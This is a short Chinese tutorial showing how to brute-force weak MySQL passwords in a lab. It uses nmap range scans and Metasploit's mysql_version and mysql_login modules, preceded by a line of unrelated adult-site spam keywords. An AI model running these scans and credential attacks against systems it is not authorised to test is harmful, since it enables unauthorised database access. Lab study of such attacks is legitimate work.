日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

一、背景介紹

Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework，簡稱叫做MSF。Metasploit作為全球最受歡迎的工具，不僅僅是因為它的方便性和強(qiáng)大性，更重要的是它的框架。它允許使用者開發(fā)自己的漏洞腳本，從而進(jìn)行測試。那么如何利用Metasploit(msf)進(jìn)行MySQL弱口令爆破呢？接下來讓我們一起學(xué)習(xí)！

二、資源裝備

1.安裝好 Kali linux 的虛擬機(jī)一臺

2.搭建好Sql server的靶機(jī)一個；

3.整裝待發(fā)的小白一個。

三、戰(zhàn)略安排

3.1 設(shè)置受害者靶機(jī)跟攻擊者主機(jī)的網(wǎng)絡(luò)模式為NAT模式，如下圖所示。

3.2 查看受害者主機(jī)的IP地址，如下圖所示。

命令：ifconfig

3.3 針對目標(biāo)受害者主機(jī)進(jìn)行信息收集，如下圖所示。

命令：nmap -sV IP

例子：nmap -sV 192.168.126.170-200

3.4 掃描結(jié)果如下圖所示，目標(biāo)攻擊者主機(jī)開啟了3306危險端口。

3.5 利用Metasploit（msf）滲透框架對目標(biāo)主機(jī)進(jìn)行信息收集，如下圖所示。

命令：msfconsole

3.6 利用msf檢索SQL相關(guān)攻擊模塊，如下圖所示。

命令：search mysql_version

3.7 利用檢索到的漏洞利用模塊，如下圖所示。

命令：use auxiliary/scanner/mysql/mysql_version

3.8 查看相關(guān)參數(shù)，如下圖所示。

命令:show options

3.9 設(shè)置參數(shù)，如下圖所示。

命令：set rhosts 192.168.126.170-200

命令：set threads 50

3.10 運(yùn)行攻擊模塊，如下圖所示。

命令：run

3.11 返回上層目錄，如下圖所示。

命令：back

3.12 檢索數(shù)據(jù)庫攻擊模塊，如下圖所示。

命令：search mysql_login

3.13 利用檢索到的攻擊模塊，如下圖所示。

命令：use auxiliary/scanner/mysql/mysql_login

3.14 查看相關(guān)參數(shù)，如下圖所示。

命令：show options

3.15 設(shè)置相關(guān)參數(shù)，如下圖所示。

3.16 設(shè)置好參數(shù)進(jìn)行攻擊，如下圖所示。

命令：run

PS：到此學(xué)習(xí)完畢，謝謝觀看，獲取更多干貨請持續(xù)關(guān)注本號！

原創(chuàng)不易，各位看官記得好評加關(guān)注哦！你也可點(diǎn)擊了解更多，或搜索：Kali與編程，學(xué)習(xí)更多Kali Linux滲透與白帽編程技巧哦！